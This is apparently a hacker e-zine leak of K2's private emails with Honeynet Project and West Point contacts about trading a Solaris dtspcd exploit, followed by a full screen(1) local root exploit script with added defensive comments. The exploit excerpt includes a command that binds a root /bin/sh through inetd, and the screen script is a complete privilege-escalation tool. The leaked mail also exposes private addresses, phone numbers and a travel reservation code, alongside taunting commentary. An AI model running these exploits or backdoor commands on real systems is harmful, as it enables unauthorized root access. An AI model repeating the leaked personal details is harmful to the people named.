Hey Lance, This version of the dtspcd exploit has been out for quite some
time. at least 3 months, it's the same version Ihave. Do you know what
signature it set off from snort?
The guy that wrote it put in some passwords for binaires that would be
distributed, so unfortuntatly some kiddies probably got it and are running
it all over the 'net :(
Anything inperticular you want to know about it?
Take care,
K2
Here are some snippets from the comments from my copy..
(I origianally found this vuln in '99;)
storm:/tmp/dtspcd/src# cat defs.h
...
/* inetd shell using above service w/passive success checking and cleanup
*/
#define DEFAULT_CMD \
"echo \"" /* service here */ " stream tcp nowait root /bin/sh sh
-i\">/tmp/x;" \
"/usr/sbin/inetd -s /tmp/x;" \
"sleep 10;" \
"/bin/rm -f /tmp/x ";
#define SUCCESS_CMD \
"uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;" \
"PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;"
\
"export PATH;echo \"BD PID(s): \"`ps -fed|grep ' -s /tmp/x'|grep -v
grep|awk '{print $2}'`\n"
....
storm:/tmp/dtspcd/src# cat dtspcd_ex.c
* What does it do?
*
* 1. remotely and silently gets the equivalent of:
* sh$ uname -nsrm
* 2. remotely and silently confirms or denies the
* existence of arbitrary user names.
* 3. remotely and somewhat silently obtain administrator
* privileges on the machine.
*
* FEATURES:
* i. ability to completely generate a target via command line
* parameters.
* ii. automatically detects which built-in target to use.
* iii. command line options override target settings.
* iv. cidr block scanning with CFLAGS='-DALLOW_CIDR -lm'
* v. option to read targets from a file
* vi. ability to brute force the target using -b
* vii. several different exploitation methods
* iix. optional password checking for binary release
* ix. passive success checking using sleep shell command
* x. tries multiple offsets automatically...
*
* PLANNED: (personal notes)
* - maybe do other OS's (AIX, OSF1)
* - eliminate nops..
*
* NOTE: this program logs nothing unless dtspcd is ran with
* -debug option.
*
* With use #3, worst cases are:
* a. /core created :(
* b. they had -debug on and they logged some information to
* /var/dt/tmp/DTSPCD.log
*
*
* For fix information see:
* CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess
* Control Service
*
*
* some thanks/greets to:
* gersh, yowie, plaguez, sircasm, K2, silitek, SolarDiz, _j_j, none,
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: no D1ck ir sin <noir@olympos.org>
Subject: RE: .
Noir, check this out... a friend of mine coded it up... I'll get ya that
ttdb sploit soon, I'm just travelling in the US right now.
I hope you hadd a good Xmas/New Year...
Later,
K2
noir sin wrote:
> Hi K2,
>
> nothing much these days, I am packing up ; ). will change the damn place I
> am living .. so not much coding or anything
> so how you doin? btw, happy new year
>
> > BTW: I passed your code to a couple of ADM guys, they really liked it.
> which one telnetd or Tru64 ttdb ?
>
> I didnt work on the ttdb fmt exploit lately. I will be so much happy if you
> could enlighten me about the issue ...
> Actually, I am working out a project that will pack almost all known
> exploits and some unknown exploits
> for Solaris and maybe some Tru64. ( well main reason is I only got some
> Solaris boxens and a Tru64 access )
>
> I wish to keep in touch with skilled ppl like you, I believe we can exchange
> real good info.
>
> take care,
> noir
>
> -----Original Message-----
> From: K2 [mailto:ktwo@ktwo.ca]
> To: noir@olympos.org
> Subject: .
>
> noir, How is it going? You getting that ttdb code working? I've got some
> time next week if you still having trouble, I'll work it out.
>
> BTW: I passed your code to a couple of ADM guys, they really liked it.
>
> Take care,
> K2
>
Attach: dtspcd-8.4.tgz
Size: 30K
note: a glimpse of the most elite zeroday trading network
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne <lance@honeynet.org>
Subject: West Point
Hey Lance, Glad to hear that nfo helped out :)
I got clearence to get late february off to go speak if the spot's still
open :)
Lemme know thx!!
K2
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspc attack
Expect a ADMmutate copy eventually ;)
but i was talking to my man... and like you can ask me questions to relay
to him if you want.
Cool about West Point I'll leason with Dragos for flights and stuffs...
Thx again.
K2
Lance Spitzner wrote:
> K2 wrote:
> > Hey Lance, This version of the dtspcd exploit has been out for quite some
> > time. at least 3 months, it's the same version Ihave. Do you know what
> > signature it set off from snort?
>
> Standard SPARC Shellcode, alert below.
>
> [**] [1:645:2] SHELLCODE sparc NOOP [**]
> [Classification: Executable code was detected] [Priority: 1]
> :05.950417 208.61.1.160:3594 -> 172.16.1.102:6112
> TCP TTL:48 TOS:0x0 ID:41402 IpLen:20 DgmLen:1500 DF
> ***AP*** Seq: 0xFF24BFA4 Ack: 0x5F79CFDD Win: 0x3EBC TcpLen: 32
> TCP Options (3) => NOP NOP TS: 463986841 4158950
> [Xref => http://www.whitehats.com/info/IDS353]
>
> > The guy that wrote it put in some passwords for binaires that would be
> > distributed, so unfortuntatly some kiddies probably got it and are running
> > it all over the 'net :(
>
> heh heh, I sure do. First, do you have an exact date when this code
> exploit was written? I'm curious to see how long it went from actual
> code to the the kiddie community.
> I'm thinking of writing a KYE paper on this exploit. The paper would
> outline the life cycle of an exploit. From vulnerability identification,
> to exploit code, to common kiddie use. We seem to have knowledge of
> all the elements. This would make a very beneficial paper to the
> community if we could document this process. What do you think about
> such a paper? We would need some input from the person who wrote the
> exploit, but anonymity would not be a problem. I know alot of .gov/.mil
> people would be very interested in such a work. Thoughts?
>
> By the way, you are famous as hell with the following agencies, Max
> Kilger and I talked about you.
>
> NSA, CIA, FBI, DoD, NSF, NIST, DARPA, NPS, DoJ, Secret Service, etc ... :)
>
> love and kisses ...
>
> lance
>
note: ktwo and lance are the best narc duo i've ever seen
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: West Point, we are a go
Lance, What dates should I get booked off from work? (I'm actually just
going to work remotely, so I can be pretty libral).
What format will the talks be?
Any of the SUN box's look pretty fly man :) I love rack mount!!
I'll take a peek at that paper soon, I'm remote from home until next week
so I'm pretty slow on a few things (I am in the US right now).
TTYL!
K2
Lance Spitzner wrote:
> All right gents,
>
> We are a go for West Point on 26 December. Dragos,
> as always I'm putting in a personal request for the
> leather pants. I need a bio from you folks, so send
> me one before Monday if possible. They need the bios
> so they can determine just how many people are going
> to attend our presentation :)
>
> They asked for estimates on travel expenses, this is
> what I gave them (just for travelling).
>
> Dragos/K2 - $1,200 each
> Michael/Jeff - $150 each
>
> Go ahead and make your travel arrangements know (especially
> K2 and Dragos). If my travel estimates are off, I need
> to know now. This is what they told me about airports
> --- snip snip ---
>
> The best airport is Stewart/Newburgh (SWF) about 20 miles north of West
> Point. Other airports in order of ease/distance include:
>
> Newark, NJ (EWR)
> LaGuardia, NY (LGA)
> JFK, NY (JFK)
>
> Although I have never flown in/out of Westchester (HPN), I have heard
> positive things about the airport if you can get a flight.
>
> --- snip snip ---
>
> --
> Lance Spitzner
> http://project.honeynet.org
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Viz Engine <kristalyviz@hotmail.com>
Subject: Re: your mail
Sure, I'll take a look.
K2
Viz Engine wrote:
> hi,
>
> I have a privat exploit for wu-imapd, developed it for linux and BSD.
> Since I have no access to Solaris or HP-UX I would like to ask you to
> port it to that systems. Would you?
>
> Viz
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: glined
glined is a type of ban off IRC "I was glined" == "I was globally banned
from the undernet"
if you connect multiple times to IRC with the same IP (3 or more), you
will be glined (for abuse)
Take care,
K2
Lance Spitzner wrote:
> Dude,
>
> What in the hell does 'glined' mean? This is taken
> from the GFORCE chats.
>
> :D1ck :i have the whole billing system
> :D1ck :glined
> :D1ck :i have the whole billing system of example
> :D1ck :oye
> :D1ck :heh
> :J4n3 :lol
> :J4n3 :glined how ?
> :J4n3 :they didn't have the same ip
> :J4n3 :billing system of example ??
>
> Thanks!
>
> --
> Lance Spitzner
> http://project.honeynet.org
note: lance is a dumb fuck
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspc attack
Here is what I got from jduck, (talk to him too see if he wants his name
in the final report though).
I can help with the writeup when I get back to Van, jd said it's cool if
you contact him too.
[jduck(dcc)] 1. discovered by aix in 1999
[jduck(dcc)] aix fixed it in 1999
[jduck(dcc)] 2. re-discovered by ISS in 2000 in solaris
[jduck(dcc)] err 2001 perhaps?
[jduck(dcc)] disclosed to sun in march 2001
[jduck(dcc)] cert/iss/etc disclosed to public november 2001
[jduck(dcc)] exploit created late november 2001
[jduck(dcc)] given to trusted people and testers
[jduck(dcc)] careless left around by certain people and stolen
<
[jduck(dcc)] shared by unknown others
jdrake@qoop.org
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: R1Ley Hassell <rhassell@eeye.com>
Subject: Re: Hey man
sure, just keep it to self right ;)
What's new? I'm still lookin for new work :(
Later,
K2
Riley Hassell wrote:
> You got a copy of the new dtspc sploit?
>
> -R
>
Attach: dtspcd-8.6.tgz
Size: 35K
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit usage
OK, gimme some time on this one, I've never used the sploit.
Lance Spitzner wrote:
> K2,
>
> Dude, I notified several .gov agencies that we
> have obtained the exploit. They can use this
> information to better protect against attacks.
> I figured your buddy will not mind, as we obtained
> it from 'the wild'.
>
> Anyways, could you give me a short paragraph on
> how the exploit works and is used? Organizations
> need to understand how the tool works, and how
> the kiddies can use it. You are the
> expert, so your insight will greatly help.
>
> Thanks!
>
> lance
>
note: cant figure it out smart guy?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit obtained (fwd)
I'll ask him
Lance Spitzner wrote:
> Your buddy interested in chatting with the MITRE folks?
> Alot of people are very impresses with his exploit :)
>
> --
> Lance Spitzner
> http://project.honeynet.org
>
> ---------- Forwarded message ----------
> From: J4ne Gray <j4ne@mitre.org>
> To: Lance Spitzner <lance@honeynet.org>
> Subject: Re: dtspcd exploit obtained
>
> I went to the apparent authors website. It hardly mentions an interest in
+security,
> but it does look like he used to teach at the University of Central Michigan
> http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with
+this
> person at all?
>
> I'm wondering if he didn't write this code to teach someone else and then that
+person
> started distributing it. This guy looks like he knows his stuff and not
+stripping the
> symbols doesn't seem to fit with that.
>
> Josh
>
> Lance Spitzner wrote:
>
> > J4ne Gray wrote:
> >
> > > It was very nice of the author to include his name and email :). I was
+looking
> > > at the strings output and it looks like the author took a lot of time to
+do error
> > > checking and write one of the better usage statements i've seen. I also
+didn't
> > > notice a single misspelling and no script kiddish text at first glance.
+To me
> > > that says a few things about the author. Is this typical of what you see
+in
> > > exploit code? Most of the stuff i've seen in public postings is nowhere
+near
> > > this clean.
> >
> > Its extremely well written, and powerful. Definitely not our
> > typical exploit :)
> >
> > lance
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit obtained (fwd)
that's funny
Lance Spitzner wrote:
> K2 wrote:
>
> > I'll ask him
>
> Dude, this is not a big deal. Just a lot of
> people interested in his exploit code, its more
> impressive then most. NSA and FBI even asked
> me for a copy. :)
>
> lance
note: nsa cant write their own version?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Dug Song <dugsong@monkey.org>
Subject: Re: feh
lame o
KIller man, thx :)))
Dug Song wrote:
> this is the most retarded shite:
>
> http://www.ngsec.com/whitepapers.html
>
> btw, i rewrote fragrouter as fragroute (runs on your local
> machine). evades everything, including snort, and it will hide all of
> your shellcode NOPs as well, with any of the TCP chaffing attacks or
> TCP segment forward overlap:
>
> http://www.monkey.org/~dugsong/fragroute-0.1.tar.gz
>
> don't redistribute, it's rough code that i want to clean up for
> release sometime...
>
> -d.
>
> ---
> http://www.monkey.org/~dugsong/
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Cloakware Corporation <charlene.hosein@cloakware.com>
Subject: Re: Network Intrusion Detection
Charlene, I was just wondering, Stanley told me about a demonstration
package of your cloaking technologie where a binary with some source code
is sent out. Do you think I could have a copy of this?
Thanks much,
Shane
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: IRC chats
Well, It's probably a spoof...
beer:~# telnet pentagon-hqdadss.army.pentagon.mil 23
Trying 134.11.6.1...
Connected to pentagon-hqdadss.army.pentagon.mil.
Escape character is '^]'.
VM/ESA ONLINE--HQDADSS --PRESS BREAK KEY TO BEGIN SESSION.^]
telnet> q
Connection closed.
VM/OS box, idono, Idoubt that somebody is IRC'ng from there ;)
CU
K2
Lance Spitzner wrote:
> Looks like one of the guys is coming in from pentagon.army.mil.
> Is this correct?
>
> --
> Lance Spitzner
> http://project.honeynet.org
note: its the analyzer!!!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
---------- Forwarded message ----------
From: Matt Conover <shok@dataforce.net>
To: w00w00@blackops.org
Subject: w00w00 with TechTV
TechTV had a segment on the ethics of hacking with a featured commentary
on w00w00. See it at
http://www.techtv.com/news/security/story/0,24195,3369909,00.html.
Matt
note: w00w00 looks lame lately, keep it up!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Catherine Nolan <catherine@syngress.com>
Subject: Re: your mail
Catherine: Here you are, sorry for the sparsity but I am very private
about many of the details outlined by the bio guidelines.
K2 is a security engineer. He works on a variety of systems ranging from
most any UNIX flavor to any other lesser OS. He has spent a lot of time
working through security issues wherever they exist; core kernels,
networking services or binary protections. K2 is a member of w00w00 and
is a contributing member of The Honeynet Project. I would like to thank
Anya for all her help and support throughout the year.
Thanks,
K2
note: Cathy, could you please add: k2 is also owned
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Catherine Nolan <catherine@syngress.com>
cc: Kate Glennon <kate@syngress.com>
Hi, Sorry I've been in Toronto all week and did not see these mails (i've
only had remote access to mail). I'll get the changes back to you by
tomarrow morning.
Thanks,
K2
Catherine Nolan wrote:
> Hey K2 -
> I need your revisions today.....the book is going to the printer next week
> and I need to have your chapter copyedited, laid out, and reviewed.
> If the book doesn't go to press next week - we're not going to have books in
> time for doubleday book club. Doubleday has ordered a significant number of
> copies for a promotion - the books must be in their warehouse by March 4th.
> It takes at least a week and a half to print a book - usually longer. As a
> royaltied author - if we miss this date - we miss 3500 units in sales. This
> will affect your income from your contribution considerably.
>
> They are not happy if we don't ship our books on time.
>
> I cannot impress upon you the urgency of this matter - your revisions were
> due on Monday - it is now Thursday.
>
> Please send these revisions to me as soon as you can - preferably before the
> end of the day.
>
> Thank you,
> Catherine
>
> Catherine B. Nolan
> Acquisitions Editor
> catherine@syngress.com
> 781-681-5151 ext 18
>
> Syngress Publishing
> 800 Hingham Street
> Rockland, MA 02370
> http://www.syngress.com
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: "Presby, T. MAJ EECS" <dt7765@exmail.usma.army.mil>
Subject: Re: USMA - Honey Net Travel Arrangements
Major Presby: Thanks for your help, I was just wondering if is possiable
that I change the return portion of this trip to layover in Kansas City
until Sunday March 3 I'll pay any difference in cost (it may even be
cheaper with the Saturday stay).
Thanks,
K2
Presby, T. MAJ EECS wrote:
> K2,
>
> Your invitational travel orders are complete and we look forward to your
> visit later this month. An electronic ticket has been generated and will be
> waiting for you at the Vancouver Airport. A complete itinerary is available
> at https://virtuallythere.com. Use the following reservation code and your
> last name to view your itinerary.
>
> Reservation Code: ESEUXD
>
> Your flight travels via Chicago to Newark, so you will be on the same flight
> as Dragos Ruiu and Lance Spitzner. Lance is authorized the rental car, so
> you will travel in one vehicle to West Point.
>
> Your lodging costs will be covered during your stay. Please contact the
> Hotel Thayer to reserve and hold your room for 25-26 Dec with your credit
> card (you will be reimbursed after the fact). Hotel Thayer has a website
> http://www.hotelthayer.com/ and they can be reached at 1-800-247-5047.
> Ensure that you mention that you are traveling under invitational travel
> orders and require the government rate.
>
> Please feel free to contact me if you have additional questions. We look
> forward to your visit.
>
> Tim
> Major Timothy Presby
> Asst. Prof., Dept. of Electrical Engineering and Computer Science
> United States Military Academy, West Point, NY 10996
> Thayer Hall 113 Phone: 845-938-5569 DSN: 688
> Email: timothy-presby@usma.edu
note: hey timmy, smile for the cameras!!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: <horizon@monkey.org>
Subject: !.?
miss you
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: joewee <joewee@monkey.org>
Subject: Re: defcon?
joewee: where are you ? I'm in NYC now.
TTYL
K2
joewee wrote:
> from dt;
>
>
> Sounds very cool. I'd be interested in reading the book when it comes
> out. People always talk about writing a book like that, but no one ever
> does.
> On another note, do you know if ADM or w00w00 has anything up their
> sleeves
> that might make for a good release at DEF CON? With the cDc basically
> falling through the last two years we are looking to see if any
> respectable
> groups have something cool they want to showcase and release come con
> time.
>
> ----
>
> anyone plan on going to defcon?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Lance Spitzner <lance@honeynet.org>
cc: 'Dragos Ruiu' <dr@kyx.net>, <ahuger@securityfocus.com>
Subject: Re: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
ALERT (fwd)
From what I hear gobbles is a composit, (made up from more then 1)
person(s). But it's all speculation anyhow. There's tons of Solaris
holes, and a grandious claim that "if you run it your vuln" is always BS,
I'm sure a moderately hardend host would be fine.
ttyl,
K2
Lance Spitzner wrote:
> Who the f*ck is this guy. He repeatedly has the most interesting
> posts I've ever read. The note at the bottom has me concerned :)
>
> --
> Lance Spitzner
> http://project.honeynet.org
>
> ---------- Forwarded message ----------
> From: gobbles@hushmail.com
> To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
> vuln-dev@securityfocus.com, bugs@securitytracker.com
> Subject: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
>
> Dear World,
> Below is copy paste of GOBBLES advisory for NTOP. NTOP available from
+www.ntop.org. This serious remote root bug in logging mechanism. Time for
+alert and disclosure is now.
>
> Website with other advisories at http://www.bugtraq.org. It look like shit
+because on free host. GOBBLES poor researcher who not out for the big dollar,
+and nothing that can be done about this at this time.
> ...
> Greets:
> Our #1 fan, Dave Aitel. Dave, GOBBLES love you -- you get free GOBBLES Security tshirt at Defcon.
>
>
> Love to all (but especially to "bob"),
> GOBBLES Security
> http://www.bugtraq.org
> GOBBLES@hushmail.com
>
>
> ps: GOBBLES currently in communication with Sun Microsystems about lethal remote bug in Solaris 6, 7, and 8. Sun has asked GOBBLES to wait one month to release advisory so that service can be fixed. GOBBLES not sure if he can wait this
long, but will try very hard to not click "send" for while longer on hole. If you run Solaris, likely you are vulnerable. But you will have to wait.
>
> No joke, this serious remote root hole. GOBBLES turned blind eye to argument
from hackers about danger of releasing vulnerabilities. GOBBLES know that only
hackers care about non-disclosure. Anyone else is likely to be very boring. :))))
>
> Hey, GOBBLES considered two ways of getting fame and recognition for he world-class security group... 1. put up a message board on bugtraq.org with gobbles group name branded all over it and let world know he have private exploits... 2. submit ground-breaking research to the securityfocus mailing lists.....
>
> hey, the latter has a bigger audience ;)))))))
>
> Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
> HushMail Secure Email http://www.hushmail.com/
> HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
> Hush Business - security for your Business http://www.hush.com/
> Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/
>
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
> ------------ Output from pgp ------------
> Pretty Good Privacy(tm) Version 6.5.8
> (c) 1999 Network Associates Inc.
> Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
> Export of this software may be restricted by the U.S. government.
> File is signed. signature not checked.
> key does not meet validity threshold.
> WARNING: Because this public key is not certified with a trusted
> signature, it is not known with high confidence that this public key
> actually belongs to: "(KeyID: 0x2199B00F)".
note: GOBBLE GOBBLE, lance afraid of the turkey?! :PpppPPpPPPp
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: "Ragsdale, D. LTC EECS" <DD9182@exmail.usma.army.mil>
Subject: Re: Glad to hear you are coming to NY
LTC Ragsdale: I'm glad that most of the exploits worked. The local
privalage escalation exploits may be a little more trickey, I think I had
sent a couple whitch will break a non-executable stack, these tend to be a
lot more fradgile, maybe play with the stack offset values and script a
brute forcing script...
Sure, I'm sort of hap-hazardly getting my life together here, I'm
booked solid through May-5, but will be available after that. Let me know
whenmight work for you and I'll work with that.
Talk to you later,
K2
PS. My recent trip reminded me that almost 4years ago I nearly enlisted
to the US Army, but then decided to go on for more school.
Ragsdale, D. LTC EECS wrote:
> K2;
>
> The Solaris exploits you sent were excellent. They were just what I
> needed. I had luck with all of them except the user2root buffer overflows
> - I could not get the offsets right. Any suggestions?
>
> Also, is there any chance we could convince you to spend a day with
> us in the near future? We would pay any travel expenses and, possibly,
> provide monetary compensation for your time. We would ask you to assist us
> to by implementing working exploits in our lab. Tell me what you think.
>
> -Dan
note: well Liutenant dan, ktwo already works for CSIS, sorry!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
############### I N C L O S I N G
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
i hope you enjoyed this little look into the liFe of a whitehat,
which can be summed up in: m0nEy-Ca$h-lameness. from mediocre
crackers, to full blown security professionals, you've certainly
made it easy on us!
ktwo, be gracious we left out your kewl poems!
catch me next month as i feature more whitehat allstars for your
viewing pleasure. NO MERCY FOR WHITEHATS!!@#@#
-- odaymaztr
.~e~----------------------------------------------------------~e~.
; *03* zeroday screen exploit -- lcamtuf ;
`----------------------------------------------------------------'
[CUT_HERE] screen.sh
#!/bin/bash
# **DO NOT DISTRIBUTE**
#
# A simple screen(1) exploit (tested against 3.09.11)
# - by Michal Zalewski (lcamtuf@bos.bindview.com)
# ----------------------------------------------------
# Usage: "./unscreen", then resume screen `00'.
# ----------------------------------------------------
# Ugh, blah... Should be written in C, but I don't
# really care now :)
# I haven't had time to check other versions, but see
# if this works for you too...
#
# This exploit is private, but you know that already...
#
# **DO NOT DISTRIBUTE**
#
# ----------------------------------------------------
# Reviewer notes (defensive reading of the listing below)
# ----------------------------------------------------
# What it does, step by step:
#   1. writes a ~/.screenrc containing a `defsocketpath` line that names a
#      path the invoking user controls ($LINK);
#   2. starts a background screen session named "00" with that config;
#   3. replaces $LINK with a symlink to a tty device node owned by uid 0;
#   4. tells the user to reattach with "screen -r 00", then deletes the
#      .screenrc and the link.
# NOTE(review): the header names 3.09.11 as the only tested version; the
# script checks neither the installed version nor the mode bits of $SCREEN.
# The technique presumably depends on screen running with elevated
# privileges (setuid/setgid install) -- confirm against the vendor advisory
# for the version actually deployed.
#
# Artifacts visible in the code that a defender can hunt for:
#   - a user-owned ~/.screenrc containing "defsocketpath";
#   - a symlink whose name ends in ".pts-00.dupa" and whose target is a
#     /dev/tty* or /dev/pts/* node;
#   - a screen process started with "-S 00 -c <home>/.screenrc";
#   - files created under "umask 0" (no permission bits masked).
# The final lines remove the .screenrc and the link, so on-disk evidence may
# be gone afterwards; process/exec auditing is the more reliable source.
#
# Exit codes are inverted relative to convention: every failure path exits
# 0 and the end of the script exits 1, so wrappers cannot rely on $?.
# ----------------------------------------------------
SCREEN=/usr/bin/screen
# Clear the umask: every file created from here on, including the
# .screenrc written below, keeps all requested permission bits.
umask 0
# Bail out (with status 0) when the hard-coded screen path is not executable.
if [ ! -x $SCREEN ]; then
echo "I can't execute $SCREEN..."
exit 0
fi
# LINK is built from the first whitespace-separated field of $HOME, a
# literal space emitted by awk, and the suffix ".pts-00.dupa". It is the
# path later handed to screen via `defsocketpath`.
LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa
# Refuse to continue if a regular file already exists at that path.
if [ -f "$LINK" ]; then
echo "DAMN. I don't have usable pts socket available..."
exit 0
fi
echo -ne "Finding root owned tty...\t\t"
unset TTY
# Walk the tty device nodes matched by these globs and keep the first one
# whose numeric owner (third column of `ls -ln`) is 0, i.e. root.
for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
TTY="$x"
break
fi
done
echo -n "$TTY"
# No root-owned tty found: give up (status 0).
if [ "$TTY" = "" ]; then
echo -e "\nI can't find a root owned tty!"
exit 0
fi
# Both $HOME and /tmp must be writable by the invoking user.
if [ ! -w $HOME -o ! -w /tmp ]; then
echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
exit 0
fi
# Overwrites any existing ~/.screenrc. The heredoc delimiter is unquoted,
# so $LINK is expanded by the shell when the file is written.
cat >$HOME/.screenrc <<_EOF_
vbell on
defscrollback 100
autodetach on
termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'
defsocketpath $LINK
_EOF_
echo -ne "\nStarting screen...\t\t\t"
# Launch screen as a background job with session name "00" and the config
# written above; all of its output is discarded.
$SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null &
# $! is the PID of the background job started on the previous line.
SCPID=`echo $!`
echo -n "PID: $SCPID"
# "$#" -ge 0 is always true, so this loop amounts to one 1-second pause.
while :; do
sleep 1
if [ "$#" -ge "0" ]; then
break
fi
done
cd /tmp
# Create a symlink inside $HOME/ that points at $LINK; errors are hidden.
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"
CNT=5 # Timeout
# Poll once per second, at most 5 times, until `-f "$LINK"` (regular-file
# test) succeeds. "Done." is printed whether or not it ever does.
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
let CNT=$CNT-1
sleep 1
done
echo -n "Done."
echo -ne "\nLinking to root owned terminal...\t\t"
# Core step: force-replace $LINK with a symlink to the root-owned tty found
# earlier. A symlink from a user-controlled path to a root-owned device
# node is the strongest on-disk indicator this script leaves, briefly.
ln -fs $TTY $LINK &>/dev/null
echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."
# Cleanup: `screen -wipe` runs in the background, then the generated
# .screenrc and the link are removed recursively with errors suppressed.
$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null
echo -ne "\rComplete.\n"
# Reached only after all steps ran; note the non-zero status on this path.
exit 1
[END_CUT] screen.sh
.~e~----------------------------------------------------------~e~.
; *04* lyfestylez of the owned and lamest with pm -- r0b1nleech ;
`----------------------------------------------------------------'
PART ONE:
<r0b1nleech> Hello, and welcome, to lyfestylez of the owned and lamest
<pm> hehe
<r0b1nleech> Our guest today is pm. pm runs one of the most secure
+ shell systems known to mankind, tell us about your system pm.
<pm> well robin, first off i would like to introduce myself
<pm> my handle stands for prepubescent monkey, no just kidding! it
+ stands for plurbious monk. i have hosted one of the most well known
+ and well renounced shell systems ever.
<pm> yes thats right, i run sneakerz.org
<r0b1nleech> :D
<pm> sneakerz.org is home to some of the finest hackers that grace
+ our planet earth. freebsd employees and yahoo employees also use
+ our super secure system.
<r0b1nleech> Hey pm, tell our viewers where you have worked recently :)
<pm> well robin, i have worked at Yahoo!, google, hotmail, microsoft, and
+ iss. i have been all over.. hehe
<r0b1nleech> Thats quite a line up.
<pm> yes r0b1n, i have a vast amount of security knowledge, i am a
+ security professional.
<pm> props to w00w00 and ADM!
<pm> oh ya, HFD!
<pm> oh i would like to also state that: I HAVE NEVER BEEN OWNED, IF YOU
+ SAY YOU OWN ME, SHOW ME SOME FUCKING LOGS. IF YOU DONT HAVE LOGS
+ SHUT YOUR FUCKING LAME MOUTH BECAUSE YOU DONT OWN SHIT.
<pm> hehe
<r0b1nleech> So pm, which known hackers have used your system?
<pm> well, off the top of my head there is: jobe, napster, billf,
+ ratcorpse, par (cant fucking forget the par master), jbl, stran9er,
